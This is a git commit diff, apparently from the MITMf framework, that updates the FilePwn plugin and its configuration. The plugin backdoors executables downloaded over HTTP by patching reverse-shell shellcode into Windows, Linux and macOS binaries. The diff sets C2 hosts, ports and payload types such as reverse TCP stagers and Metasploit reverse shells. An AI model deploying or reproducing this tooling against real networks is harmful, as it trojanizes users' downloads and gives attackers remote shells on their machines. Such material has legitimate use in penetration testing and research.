Merged Filepwn plugin and config file changes

2025-07-08 05:51:48 -07:00 · 2015-04-15 00:40:01 +02:00 · 2015-04-15 00:40:01 +02:00 · 8eb09309d2
commit 8eb09309d2
parent 460399541f
3 changed files with 45 additions and 32 deletions
--- a/config/mitmf.conf
+++ b/config/mitmf.conf
@ -363,6 +363,7 @@
 		FileSizeMax = 60000000  # ~60 MB (just under) No patching of files this large
 		CompressedFiles = True #True/False
 			[[[[LinuxIntelx86]]]]
 			SHELL = reverse_shell_tcp   # This is the BDF syntax
 			HOST = 192.168.1.168 		# The C2
@ -378,10 +379,12 @@
 			MSFPAYLOAD = linux/x64/shell_reverse_tcp
 			[[[[WindowsIntelx86]]]]
-			PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
+			PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
 			# PATCH_METHOD overwrites PATCH_TYPE with jump
 			PATCH_METHOD = automatic
 			HOST = 192.168.1.16
-			PORT = 4444
+			PORT = 8443
-			SHELL = reverse_tcp_stager 
+			SHELL = iat_reverse_tcp_stager_threaded
 			SUPPLIED_SHELLCODE = None
 			ZERO_CERT = False
 			PATCH_DLL = True
@ -389,10 +392,12 @@
 			[[[[WindowsIntelx64]]]]
 			PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
 			# PATCH_METHOD overwrites PATCH_TYPE with jump
 			PATCH_METHOD = automatic
 			HOST = 192.168.1.16
 			PORT = 8088
-			SHELL = reverse_shell_tcp
+			SHELL = iat_reverse_tcp_stager_threaded
-			SUPPLIED_SHELLCODE = Nonepatchpatchpatch
+			SUPPLIED_SHELLCODE = None
 			ZERO_CERT = True
 			PATCH_DLL = False
 			MSFPAYLOAD = windows/x64/shell_reverse_tcp
--- a/libs/bdfactory
+++ b/libs/bdfactory
@ -1 +1 @@
-Subproject commit 9ce83ead5ddc4daa798b0f144b3cfeece6809c19
+Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
@ -78,7 +78,7 @@ class FilePwn(Plugin):
    optname     = "filepwn"
    desc        = "Backdoor executables being sent over http using bdfactory"
    implements  = ["handleResponse"]
-    tree_output = ["BDFProxy v0.2 online"]
+    tree_output = ["BDFProxy v0.3.2 online"]
    version     = "0.2"
    has_opts    = False
@ -123,8 +123,6 @@ class FilePwn(Plugin):
        self.zipblacklist    = self.userConfig['ZIP']['blacklist']
        self.tarblacklist    = self.userConfig['TAR']['blacklist']
        self.output.append("BDFProxy by midnite_runr online")
    def convert_to_Bool(self, aString):
        if aString.lower() == 'true':
            return True
@ -167,6 +165,10 @@ class FilePwn(Plugin):
                        elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
                            cave_jumping = True
                        # if automatic override
                        if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
                            cave_jumping = True
                        targetFile = pebin.pebin(FILE=binaryFile,
                                                 OUTPUT=os.path.basename(binaryFile),
                                                 SHELL=self.WindowsIntelx64['SHELL'],
@ -178,6 +180,7 @@ class FilePwn(Plugin):
                                                 PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
                                                 SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
                                                 ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
                                                 PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
                                                 )
                        result = targetFile.run_this()
@ -193,6 +196,10 @@ class FilePwn(Plugin):
                        elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
                            cave_jumping = True
                        # if automatic override
                        if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
                            cave_jumping = True
                        targetFile = pebin.pebin(FILE=binaryFile,
                                                 OUTPUT=os.path.basename(binaryFile),
                                                 SHELL=self.WindowsIntelx86['SHELL'],
@ -203,7 +210,8 @@ class FilePwn(Plugin):
                                                 IMAGE_TYPE=self.WindowsType,
                                                 PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
                                                 SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
-                                                 ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
+                                                 ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
                                                 PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
                                                 )
                        result = targetFile.run_this()
@ -236,7 +244,7 @@ class FilePwn(Plugin):
                                               )
                    result = targetFile.run_this()
-            elif binaryHeader[:4].encode('hex') in  ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
+            elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']:  # Macho
                targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
                targetFile.support_check()
@ -245,29 +253,29 @@ class FilePwn(Plugin):
                if targetFile.FAT_FILE is True:
                    if self.FatPriority == 'x86':
                        targetFile = machobin.machobin(FILE=binaryFile,
-                                                   OUTPUT = os.path.basename(binaryFile),
+                                                       OUTPUT=os.path.basename(binaryFile),
-                                                   SHELL=self.MachoIntelx86['SHELL'],
+                                                       SHELL=self.MachoIntelx86['SHELL'],
-                                                   HOST=self.MachoIntelx86['HOST'],
+                                                       HOST=self.MachoIntelx86['HOST'],
-                                                   PORT=int(self.MachoIntelx86['PORT']),
+                                                       PORT=int(self.MachoIntelx86['PORT']),
-                                                   SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
+                                                       SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
-                                                   FAT_PRIORITY=self.FatPriority
+                                                       FAT_PRIORITY=self.FatPriority
-                                                   )
+                                                       )
                        result = targetFile.run_this()
                    elif self.FatPriority == 'x64':
                        targetFile = machobin.machobin(FILE=binaryFile,
-                                                   OUTPUT = os.path.basename(binaryFile),
+                                                       OUTPUT=os.path.basename(binaryFile),
-                                                   SHELL=self.MachoIntelx64['SHELL'],
+                                                       SHELL=self.MachoIntelx64['SHELL'],
-                                                   HOST=self.MachoIntelx64['HOST'],
+                                                       HOST=self.MachoIntelx64['HOST'],
-                                                   PORT=int(self.MachoIntelx64['PORT']),
+                                                       PORT=int(self.MachoIntelx64['PORT']),
-                                                   SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
+                                                       SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
-                                                   FAT_PRIORITY=self.FatPriority
+                                                       FAT_PRIORITY=self.FatPriority
-                                                   )
+                                                       )
                        result = targetFile.run_this()
                elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
                    targetFile = machobin.machobin(FILE=binaryFile,
-                                                   OUTPUT = os.path.basename(binaryFile),
+                                                   OUTPUT=os.path.basename(binaryFile),
                                                   SHELL=self.MachoIntelx86['SHELL'],
                                                   HOST=self.MachoIntelx86['HOST'],
                                                   PORT=int(self.MachoIntelx86['PORT']),
@ -278,7 +286,7 @@ class FilePwn(Plugin):
                elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
                    targetFile = machobin.machobin(FILE=binaryFile,
-                                                   OUTPUT = os.path.basename(binaryFile),
+                                                   OUTPUT=os.path.basename(binaryFile),
                                                   SHELL=self.MachoIntelx64['SHELL'],
                                                   HOST=self.MachoIntelx64['HOST'],
                                                   PORT=int(self.MachoIntelx64['PORT']),
		`@ -1 +1 @@`
			`Subproject commit 9ce83ead5ddc4daa798b0f144b3cfeece6809c19`				`Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b`